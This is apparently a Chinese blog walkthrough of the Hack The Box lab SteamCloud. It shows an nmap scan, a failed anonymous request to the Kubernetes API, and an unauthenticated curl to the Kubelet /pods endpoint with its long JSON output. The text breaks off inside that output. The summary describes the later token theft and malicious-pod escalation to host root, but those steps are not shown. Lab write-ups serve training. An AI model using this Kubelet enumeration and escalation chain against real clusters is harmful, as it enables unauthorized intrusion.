SteamCloud:从Kubelet匿名访问到Pod提权的云原生攻防

# 技术博文 # HTB # 云安全
AI摘要:本次云原生渗透测试利用了**Kubelet匿名访问**漏洞,成功从一个普通用户Pod提权并最终获取了主机的root权限。攻击过程包括信息侦察、利用Kubelet未授权访问、获取服务令牌、创建恶意Pod以及最终读取Flag。

攻击机ip:10.10.16.3
靶机IP:10.10.11.133

首先nmap

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp

得到结果

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-13 09:34 CST
Nmap scan report for 10.10.11.133
Host is up (0.42s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10249/tcp open  unknown
10250/tcp open  unknown
10256/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds

SSH 默认端口为 22。Etcd 是一个 Kubernetes 组件,客户端监听端口为 2379,服务器端口为 2380。Kubelet 是一个 Kubernetes 扩展,默认监听端口为 10250,Kubernetes API 监听端口为 8443。让我先来看看 Kubernetes API,它在 8443 端口上可访问。

首先尝试访问Kubernetes API Server(8443端口),检查是否存在未授权访问:
访问“https://10.10.11.133:8443
发现403

{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
    
  },
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {
    
  },
  "code": 403
}

输出显示我们无法在未经身份验证的情况下访问主目录,因此让我们继续查看监听在 10250 端口上的 Kubelet 服务。

curl https://10.10.11.133:10250/pods -k 
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kube-controller-manager-steamcloud","namespace":"kube-system","selfLink":"/api/v1/namespaces/kube-system/pods/kube-controller-manager-steamcloud","uid":"be2478237d1af444b624cb01f51f79c4","creationTimestamp":null,"labels":{"component":"kube-controller-manager","tier":"control-plane"},"annotations":{"kubernetes.io/config.hash":"be2478237d1af444b624cb01f51f79c4","kubernetes.io/config.seen":"2025-09-12T21:29:29.748824313-04:00","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"ca-certs","hostPath":{"path":"/etc/ssl/certs","type":"DirectoryOrCreate"}},{"name":"etc-ca-certificates","hostPath":{"path":"/etc/ca-certificates","type":"DirectoryOrCreate"}},{"name":"flexvolume-dir","hostPath":{"path":"/usr/libexec/kubernetes/kubelet-plugins/volume/exec","type":"DirectoryOrCreate"}},{"name":"k8s-certs","hostPath":{"path":"/var/lib/minikube/certs","type":"DirectoryOrCreate"}},{"name":"kubeconfig","hostPath":{"path":"/etc/kubernetes/controller-manager.conf","type":"FileOrCreate"}},{"name":"usr-local-share-ca-certificates","hostPath":{"path":"/usr/local/share/ca-certificates","type":"DirectoryOrCreate"}},{"name":"usr-share-ca-certificates","hostPath":{"path":"/usr/share/ca-certificates","type":"DirectoryOrCreate"}}],"containers":[{"name":"kube-controller-manager","image":"k8s.gcr.io/kube-controller-manager:v1.22.3","command":["kube-controller-manager","--allocate-node-cidrs=true","--authentication-kubeconfig=/etc/kubernetes/controller-manager.conf","--authorization-kubeconfig=/etc/kubernetes/controller-manager.conf","--bind-address=127.0.0.1","--client-ca-file=/var/lib/minikube/certs/ca.crt","--cluster-cidr=10.244.0.0/16","--cluster-name=mk","--cluster-signing-cert-file=/var/lib/minikube/certs/ca.crt","--cluster-signing-key-file=/var/lib/minikube/certs/ca.key","--controllers=*,bootstrapsigner,tokencleaner","--kubeconfig=/etc/kubernetes/controller-manager.conf","--leader-elect=false","--port=0","--requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt","--root-ca-file=/var/lib/minikube/certs/ca.crt","--service-account-private-key-file=/var/lib/minikube/certs/sa.key","--service-cluster-ip-range=10.96.0.0/12","--use-service-account-credentials=true"],"resources":{"requests":{"cpu":"200m"}},"volumeMounts":[{"name":"ca-certs","readOnly":true,"mountPath":"/etc/ssl/certs"},{"name":"etc-ca-certificates","readOnly":true,"mountPath":"/etc/ca-certificates"},{"name":"flexvolume-dir","mountPath":"/usr/libexec/kubernetes/kubelet-plugins/volume/exec"},{"name":"k8s-certs","readOnly":true,"mountPath":"/var/lib/minikube/certs"},{"name":"kubeconfig","readOnly":true,"mountPath":"/etc/kubernetes/controller-manager.conf"},{"name":"usr-local-share-ca-certificates","readOnly":true,"mountPath":"/usr/local/share/ca-certificates"},{"name":"usr-share-ca-certificates","readOnly":true,"mountPath":"/usr/share/ca-certificates"}],"livenessProbe":{"httpGet":{"path":"/healthz","port":10257,"host":"127.0.0.1","scheme":"HTTPS"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":8},"startupProbe":{"httpGet":{"path":"/healthz","port":10257,"host":"127.0.0.1","scheme":"HTTPS"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":24},"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","nodeName":"steamcloud","hostNetwork":true,"securityContext":{"seccompProfile":{"type":"RuntimeDefault"}},"schedulerName":"default-scheduler","tolerations":[{"operator":"Exists","effect":"NoExecute"}],"priorityClassName":"system-node-critical","enableServiceLinks":true},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:35Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:35Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"}],"hostIP":"10.10.11.133","podIP":"10.10.11.133","podIPs":[{"ip":"10.10.11.133"}],"startTime":"2025-09-13T01:29:30Z","containerStatuses":[{"name":"kube-controller-manager","state":{"running":{"startedAt":"2025-09-13T01:29:17Z"}},"lastState":{},"ready":true,"restartCount":23,"image":"k8s.gcr.io/kube-controller-manager:v1.22.3","imageID":"docker-pullable://k8s.gcr.io/kube-controller-manager@sha256:e67dbfd3796b7ce04fee80acb52876928c290224a91862c5849c3ab0fa31ca78","containerID":"docker://36aaf9ae0e34c56006116a76961d24a15ee938d72c56e40a813fe8cf11ef33be","started":true}],"qosClass":"Burstable"}},{"metadata":{"name":"kube-scheduler-steamcloud","namespace":"kube-system","selfLink":"/api/v1/namespaces/kube-system/pods/kube-scheduler-steamcloud","uid":"3232b72c69e9f8bf518a7d727d878b27","creationTimestamp":null,"labels":{"component":"kube-scheduler","tier":"control-plane"},"annotations":{"kubernetes.io/config.hash":"3232b72c69e9f8bf518a7d727d878b27","kubernetes.io/config.seen":"2025-09-12T21:29:29.748830024-04:00","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"kubeconfig","hostPath":{"path":"/etc/kubernetes/scheduler.conf","type":"FileOrCreate"}}],"containers":[{"name":"kube-scheduler","image":"k8s.gcr.io/kube-scheduler:v1.22.3","command":["kube-scheduler","--authentication-kubeconfig=/etc/kubernetes/scheduler.conf","--authorization-kubeconfig=/etc/kubernetes/scheduler.conf","--bind-address=127.0.0.1","--kubeconfig=/etc/kubernetes/scheduler.conf","--leader-elect=false","--port=0"],"resources":{"requests":{"cpu":"100m"}},"volumeMounts":[{"name":"kubeconfig","readOnly":true,"mountPath":"/etc/kubernetes/scheduler.conf"}],"livenessProbe":{"httpGet":{"path":"/healthz","port":10259,"host":"127.0.0.1","scheme":"HTTPS"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":8},"startupProbe":{"httpGet":{"path":"/healthz","port":10259,"host":"127.0.0.1","scheme":"HTTPS"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":24},"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","nodeName":"steamcloud","hostNetwork":true,"securityContext":{"seccompProfile":{"type":"RuntimeDefault"}},"schedulerName":"default-scheduler","tolerations":[{"operator":"Exists","effect":"NoExecute"}],"priorityClassName":"system-node-critical","enableServiceLinks":true},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:33Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:33Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"}],"hostIP":"10.10.11.133","podIP":"10.10.11.133","podIPs":[{"ip":"10.10.11.133"}],"startTime":"2025-09-13T01:29:30Z","containerStatuses":[{"name":"kube-scheduler","state":{"running":{"startedAt":"2025-09-13T01:29:17Z"}},"lastState":{},"ready":true,"restartCount":22,"image":"k8s.gcr.io/kube-scheduler:v1.22.3","imageID":"docker-pullable://k8s.gcr.io/kube-scheduler@sha256:cac7ea67201a84c00f3e8d9be51877c25fb539055ac404c4a9d2dd4c79d3fdab","containerID":"docker://731772f15db409db512e4b61d1374ec093a260abd206d0737ef4f78c6d8b23a8","started":true}],"qosClass":"Burstable"}},{"metadata":{"name":"etcd-steamcloud","namespace":"kube-system","selfLink":"/api/v1/namespaces/kube-system/pods/etcd-steamcloud","uid":"967b9bee71f2e3cec06ff1dbde2a2a19","creationTimestamp":null,"labels":{"component":"etcd","tier":"control-plane"},"annotations":{"kubeadm.kubernetes.io/etcd.advertise-client-urls":"https://10.10.11.133:2379","kubernetes.io/config.hash":"967b9bee71f2e3cec06ff1dbde2a2a19","kubernetes.io/config.seen":"2025-09-12T21:29:29.748831647-04:00","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"etcd-certs","hostPath":{"path":"/var/lib/minikube/certs/etcd","type":"DirectoryOrCreate"}},{"name":"etcd-data","hostPath":{"path":"/var/lib/minikube/etcd","type":"DirectoryOrCreate"}}],"containers":[{"name":"etcd","image":"k8s.gcr.io/etcd:3.5.0-0","command":["etcd","--advertise-client-urls=https://10.10.11.133:2379","--cert-file=/var/lib/minikube/certs/etcd/server.crt","--client-cert-auth=true","--data-dir=/var/lib/minikube/etcd","--initial-advertise-peer-urls=https://10.10.11.133:2380","--initial-cluster=steamcloud=https://10.10.11.133:2380","--key-file=/var/lib/minikube/certs/etcd/server.key","--listen-client-urls=https://127.0.0.1:2379,https://10.10.11.133:2379","--listen-metrics-urls=http://127.0.0.1:2381","--listen-peer-urls=https://10.10.11.133:2380","--name=steamcloud","--peer-cert-file=/var/lib/minikube/certs/etcd/peer.crt","--peer-client-cert-auth=true","--peer-key-file=/var/lib/minikube/certs/etcd/peer.key","--peer-trusted-ca-file=/var/lib/minikube/certs/etcd/ca.crt","--proxy-refresh-interval=70000","--snapshot-count=10000","--trusted-ca-file=/var/lib/minikube/certs/etcd/ca.crt"],"resources":{"requests":{"cpu":"100m","memory":"100Mi"}},"volumeMounts":[{"name":"etcd-data","mountPath":"/var/lib/minikube/etcd"},{"name":"etcd-certs","mountPath":"/var/lib/minikube/certs/etcd"}],"livenessProbe":{"httpGet":{"path":"/health","port":2381,"host":"127.0.0.1","scheme":"HTTP"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":8},"startupProbe":{"httpGet":{"path":"/health","port":2381,"host":"127.0.0.1","scheme":"HTTP"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":24},"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","nodeName":"steamcloud","hostNetwork":true,"securityContext":{"seccompProfile":{"type":"RuntimeDefault"}},"schedulerName":"default-scheduler","tolerations":[{"operator":"Exists","effect":"NoExecute"}],"priorityClassName":"system-node-critical","enableServiceLinks":true},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:35Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:35Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"}],"hostIP":"10.10.11.133","podIP":"10.10.11.133","podIPs":[{"ip":"10.10.11.133"}],"startTime":"2025-09-13T01:29:30Z","containerStatuses":[{"name":"etcd","state":{"running":{"startedAt":"2025-09-13T01:29:17Z"}},"lastState":{},"ready":true,"restartCount":0,"image":"k8s.gcr.io/etcd:3.5.0-0","imageID":"docker-pullable://k8s.gcr.io/etcd@sha256:9ce33ba33d8e738a5b85ed50b5080ac746deceed4a7496c550927a7a19ca3b6d","containerID":"docker://b8ca92b2d372bbb7d0b7065c3d2edf97afb2ec24517d2ce0525110ef1562f8e4","started":true}],"qosClass":"Burstable"}},{"metadata":{"name":"kube-apiserver-steamcloud","namespace":"kube-system","selfLink":"/api/v1/namespaces/kube-system/pods/kube-apiserver-steamcloud","uid":"c1926d0465cd9de10197b95a2c359105","creationTimestamp":null,"labels":{"component":"kube-apiserver","tier":"control-plane"},"annotations":{"kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint":"10.10.11.133:8443","kubernetes.io/config.hash":"c1926d0465cd9de10197b95a2c359105","kubernetes.io/config.seen":"2025-09-12T21:29:29.748832779-04:00","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"ca-certs","hostPath":{"path":"/etc/ssl/certs","type":"DirectoryOrCreate"}},{"name":"etc-ca-certificates","hostPath":{"path":"/etc/ca-certificates","type":"DirectoryOrCreate"}},{"name":"k8s-certs","hostPath":{"path":"/var/lib/minikube/certs","type":"DirectoryOrCreate"}},{"name":"usr-local-share-ca-certificates","hostPath":{"path":"/usr/local/share/ca-certificates","type":"DirectoryOrCreate"}},{"name":"usr-share-ca-certificates","hostPath":{"path":"/usr/share/ca-certificates","type":"DirectoryOrCreate"}}],"containers":[{"name":"kube-apiserver","image":"k8s.gcr.io/kube-apiserver:v1.22.3","command":["kube-apiserver","--advertise-address=10.10.11.133","--allow-privileged=true","--authorization-mode=Node,RBAC","--client-ca-file=/var/lib/minikube/certs/ca.crt","--enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota","--enable-bootstrap-token-auth=true","--etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt","--etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt","--etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key","--etcd-servers=https://127.0.0.1:2379","--kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt","--kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key","--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname","--proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt","--proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key","--requestheader-allowed-names=front-proxy-client","--requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt","--requestheader-extra-headers-prefix=X-Remote-Extra-","--requestheader-group-headers=X-Remote-Group","--requestheader-username-headers=X-Remote-User","--secure-port=8443","--service-account-issuer=https://kubernetes.default.svc.cluster.local","--service-account-key-file=/var/lib/minikube/certs/sa.pub","--service-account-signing-key-file=/var/lib/minikube/certs/sa.key","--service-cluster-ip-range=10.96.0.0/12","--tls-cert-file=/var/lib/minikube/certs/apiserver.crt","--tls-private-key-file=/var/lib/minikube/certs/apiserver.key"],"resources":{"requests":{"cpu":"250m"}},"volumeMounts":[{"name":"ca-certs","readOnly":true,"mountPath":"/etc/ssl/certs"},{"name":"etc-ca-certificates","readOnly":true,"mountPath":"/etc/ca-certificates"},{"name":"k8s-certs","readOnly":true,"mountPath":"/var/lib/minikube/certs"},{"name":"usr-local-share-ca-certificates","readOnly":true,"mountPath":"/usr/local/share/ca-certificates"},{"name":"usr-share-ca-certificates","readOnly":true,"mountPath":"/usr/share/ca-certificates"}],"livenessProbe":{"httpGet":{"path":"/livez","port":8443,"host":"10.10.11.133","scheme":"HTTPS"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":8},"readinessProbe":{"httpGet":{"path":"/readyz","port":8443,"host":"10.10.11.133","scheme":"HTTPS"},"timeoutSeconds":15,"periodSeconds":1,"successThreshold":1,"failureThreshold":3},"startupProbe":{"httpGet":{"path":"/livez","port":8443,"host":"10.10.11.133","scheme":"HTTPS"},"initialDelaySeconds":10,"timeoutSeconds":15,"periodSeconds":10,"successThreshold":1,"failureThreshold":24},"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","nodeName":"steamcloud","hostNetwork":true,"securityContext":{"seccompProfile":{"type":"RuntimeDefault"}},"schedulerName":"default-scheduler","tolerations":[{"operator":"Exists","effect":"NoExecute"}],"priorityClassName":"system-node-critical","enableServiceLinks":true},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:35Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:35Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:30Z"}],"hostIP":"10.10.11.133","podIP":"10.10.11.133","podIPs":[{"ip":"10.10.11.133"}],"startTime":"2025-09-13T01:29:30Z","containerStatuses":[{"name":"kube-apiserver","state":{"running":{"startedAt":"2025-09-13T01:29:17Z"}},"lastState":{},"ready":true,"restartCount":0,"image":"k8s.gcr.io/kube-apiserver:v1.22.3","imageID":"docker-pullable://k8s.gcr.io/kube-apiserver@sha256:6ee1c59e9c1fb570e7958e267a6993988eaa22448beb70d99de7afb21e862e9d","containerID":"docker://a74fc6518525001132bd151963304f33c76464517df6879e55f036c3de82126b","started":true}],"qosClass":"Burstable"}},{"metadata":{"name":"storage-provisioner","namespace":"kube-system","uid":"e024dc3f-1109-4874-909a-692c4a5a114d","resourceVersion":"406","creationTimestamp":"2025-09-13T01:29:28Z","labels":{"addonmanager.kubernetes.io/mode":"Reconcile","integration-test":"storage-provisioner"},"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"labels\":{\"addonmanager.kubernetes.io/mode\":\"Reconcile\",\"integration-test\":\"storage-provisioner\"},\"name\":\"storage-provisioner\",\"namespace\":\"kube-system\"},\"spec\":{\"containers\":[{\"command\":[\"/storage-provisioner\"],\"image\":\"gcr.io/k8s-minikube/storage-provisioner:v5\",\"imagePullPolicy\":\"IfNotPresent\",\"name\":\"storage-provisioner\",\"volumeMounts\":[{\"mountPath\":\"/tmp\",\"name\":\"tmp\"}]}],\"hostNetwork\":true,\"serviceAccountName\":\"storage-provisioner\",\"volumes\":[{\"hostPath\":{\"path\":\"/tmp\",\"type\":\"Directory\"},\"name\":\"tmp\"}]}}\n","kubernetes.io/config.seen":"2025-09-12T21:29:38.649800099-04:00","kubernetes.io/config.source":"api"},"managedFields":[{"manager":"kube-scheduler","operation":"Update","apiVersion":"v1","time":"2025-09-13T01:29:28Z","fieldsType":"FieldsV1","fieldsV1":{"f:status":{"f:conditions":{".":{},"k:{\"type\":\"PodScheduled\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:message":{},"f:reason":{},"f:status":{},"f:type":{}}}}},"subresource":"status"},{"manager":"kubectl-client-side-apply","operation":"Update","apiVersion":"v1","time":"2025-09-13T01:29:28Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}},"f:labels":{".":{},"f:addonmanager.kubernetes.io/mode":{},"f:integration-test":{}}},"f:spec":{"f:containers":{"k:{\"name\":\"storage-provisioner\"}":{".":{},"f:command":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{},"f:volumeMounts":{".":{},"k:{\"mountPath\":\"/tmp\"}":{".":{},"f:mountPath":{},"f:name":{}}}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:hostNetwork":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:serviceAccount":{},"f:serviceAccountName":{},"f:terminationGracePeriodSeconds":{},"f:volumes":{".":{},"k:{\"name\":\"tmp\"}":{".":{},"f:hostPath":{".":{},"f:path":{},"f:type":{}},"f:name":{}}}}}}]},"spec":{"volumes":[{"name":"tmp","hostPath":{"path":"/tmp","type":"Directory"}},{"name":"kube-api-access-7kkw9","projected":{"sources":[{"serviceAccountToken":{"expirationSeconds":3607,"path":"token"}},{"configMap":{"name":"kube-root-ca.crt","items":[{"key":"ca.crt","path":"ca.crt"}]}},{"downwardAPI":{"items":[{"path":"namespace","fieldRef":{"apiVersion":"v1","fieldPath":"metadata.namespace"}}]}}],"defaultMode":420}}],"containers":[{"name":"storage-provisioner","image":"gcr.io/k8s-minikube/storage-provisioner:v5","command":["/storage-provisioner"],"resources":{},"volumeMounts":[{"name":"tmp","mountPath":"/tmp"},{"name":"kube-api-access-7kkw9","readOnly":true,"mountPath":"/var/run/secrets/kubernetes.io/serviceaccount"}],"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","serviceAccountName":"storage-provisioner","serviceAccount":"storage-provisioner","nodeName":"steamcloud","hostNetwork":true,"securityContext":{},"schedulerName":"default-scheduler","tolerations":[{"key":"node.kubernetes.io/not-ready","operator":"Exists","effect":"NoExecute","tolerationSeconds":300},{"key":"node.kubernetes.io/unreachable","operator":"Exists","effect":"NoExecute","tolerationSeconds":300}],"priority":0,"enableServiceLinks":true,"preemptionPolicy":"PreemptLowerPriority"},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:38Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:12Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:12Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:38Z"}],"hostIP":"10.10.11.133","podIP":"10.10.11.133","podIPs":[{"ip":"10.10.11.133"}],"startTime":"2025-09-13T01:29:38Z","containerStatuses":[{"name":"storage-provisioner","state":{"running":{"startedAt":"2025-09-13T01:30:11Z"}},"lastState":{"terminated":{"exitCode":1,"reason":"Error","startedAt":"2025-09-13T01:29:40Z","finishedAt":"2025-09-13T01:30:10Z","containerID":"docker://e647fb88730f23a54fa400f5643afe6b2b0296a70db33658efa2be52a579829b"}},"ready":true,"restartCount":1,"image":"gcr.io/k8s-minikube/storage-provisioner:v5","imageID":"docker-pullable://gcr.io/k8s-minikube/storage-provisioner@sha256:18eb69d1418e854ad5a19e399310e52808a8321e4c441c1dddad8977a0d7a944","containerID":"docker://1f2dbf44b4db2bd14455382a5d0eb88201dcfb37f2b915962ce88336df609c8b","started":true}],"qosClass":"BestEffort"}},{"metadata":{"name":"kube-proxy-gb8zn","generateName":"kube-proxy-","namespace":"kube-system","uid":"239a4b53-afc2-45cc-8fa9-f31176049e21","resourceVersion":"413","creationTimestamp":"2025-09-13T01:29:38Z","labels":{"controller-revision-hash":"674d79d6f9","k8s-app":"kube-proxy","pod-template-generation":"1"},"annotations":{"kubernetes.io/config.seen":"2025-09-12T21:29:38.740131311-04:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"DaemonSet","name":"kube-proxy","uid":"38e7ec06-71ff-44fa-9588-7b47edc414e6","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2025-09-13T01:29:38Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:controller-revision-hash":{},"f:k8s-app":{},"f:pod-template-generation":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\"38e7ec06-71ff-44fa-9588-7b47edc414e6\"}":{}}},"f:spec":{"f:affinity":{".":{},"f:nodeAffinity":{".":{},"f:requiredDuringSchedulingIgnoredDuringExecution":{}}},"f:containers":{"k:{\"name\":\"kube-proxy\"}":{".":{},"f:command":{},"f:env":{".":{},"k:{\"name\":\"NODE_NAME\"}":{".":{},"f:name":{},"f:valueFrom":{".":{},"f:fieldRef":{}}}},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:securityContext":{".":{},"f:privileged":{}},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{},"f:volumeMounts":{".":{},"k:{\"mountPath\":\"/lib/modules\"}":{".":{},"f:mountPath":{},"f:name":{},"f:readOnly":{}},"k:{\"mountPath\":\"/run/xtables.lock\"}":{".":{},"f:mountPath":{},"f:name":{}},"k:{\"mountPath\":\"/var/lib/kube-proxy\"}":{".":{},"f:mountPath":{},"f:name":{}}}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:hostNetwork":{},"f:nodeSelector":{},"f:priorityClassName":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:serviceAccount":{},"f:serviceAccountName":{},"f:terminationGracePeriodSeconds":{},"f:tolerations":{},"f:volumes":{".":{},"k:{\"name\":\"kube-proxy\"}":{".":{},"f:configMap":{".":{},"f:defaultMode":{},"f:name":{}},"f:name":{}},"k:{\"name\":\"lib-modules\"}":{".":{},"f:hostPath":{".":{},"f:path":{},"f:type":{}},"f:name":{}},"k:{\"name\":\"xtables-lock\"}":{".":{},"f:hostPath":{".":{},"f:path":{},"f:type":{}},"f:name":{}}}}}}]},"spec":{"volumes":[{"name":"kube-proxy","configMap":{"name":"kube-proxy","defaultMode":420}},{"name":"xtables-lock","hostPath":{"path":"/run/xtables.lock","type":"FileOrCreate"}},{"name":"lib-modules","hostPath":{"path":"/lib/modules","type":""}},{"name":"kube-api-access-cjqjd","projected":{"sources":[{"serviceAccountToken":{"expirationSeconds":3607,"path":"token"}},{"configMap":{"name":"kube-root-ca.crt","items":[{"key":"ca.crt","path":"ca.crt"}]}},{"downwardAPI":{"items":[{"path":"namespace","fieldRef":{"apiVersion":"v1","fieldPath":"metadata.namespace"}}]}}],"defaultMode":420}}],"containers":[{"name":"kube-proxy","image":"k8s.gcr.io/kube-proxy:v1.22.3","command":["/usr/local/bin/kube-proxy","--config=/var/lib/kube-proxy/config.conf","--hostname-override=$(NODE_NAME)"],"env":[{"name":"NODE_NAME","valueFrom":{"fieldRef":{"apiVersion":"v1","fieldPath":"spec.nodeName"}}}],"resources":{},"volumeMounts":[{"name":"kube-proxy","mountPath":"/var/lib/kube-proxy"},{"name":"xtables-lock","mountPath":"/run/xtables.lock"},{"name":"lib-modules","readOnly":true,"mountPath":"/lib/modules"},{"name":"kube-api-access-cjqjd","readOnly":true,"mountPath":"/var/run/secrets/kubernetes.io/serviceaccount"}],"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","nodeSelector":{"kubernetes.io/os":"linux"},"serviceAccountName":"kube-proxy","serviceAccount":"kube-proxy","nodeName":"steamcloud","hostNetwork":true,"securityContext":{},"affinity":{"nodeAffinity":{"requiredDuringSchedulingIgnoredDuringExecution":{"nodeSelectorTerms":[{"matchFields":[{"key":"metadata.name","operator":"In","values":["steamcloud"]}]}]}}},"schedulerName":"default-scheduler","tolerations":[{"operator":"Exists"},{"key":"node.kubernetes.io/not-ready","operator":"Exists","effect":"NoExecute"},{"key":"node.kubernetes.io/unreachable","operator":"Exists","effect":"NoExecute"},{"key":"node.kubernetes.io/disk-pressure","operator":"Exists","effect":"NoSchedule"},{"key":"node.kubernetes.io/memory-pressure","operator":"Exists","effect":"NoSchedule"},{"key":"node.kubernetes.io/pid-pressure","operator":"Exists","effect":"NoSchedule"},{"key":"node.kubernetes.io/unschedulable","operator":"Exists","effect":"NoSchedule"},{"key":"node.kubernetes.io/network-unavailable","operator":"Exists","effect":"NoSchedule"}],"priorityClassName":"system-node-critical","priority":2000001000,"enableServiceLinks":true,"preemptionPolicy":"PreemptLowerPriority"},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:38Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:40Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:40Z"},{"type":"PodScheduled","status":"True","lastP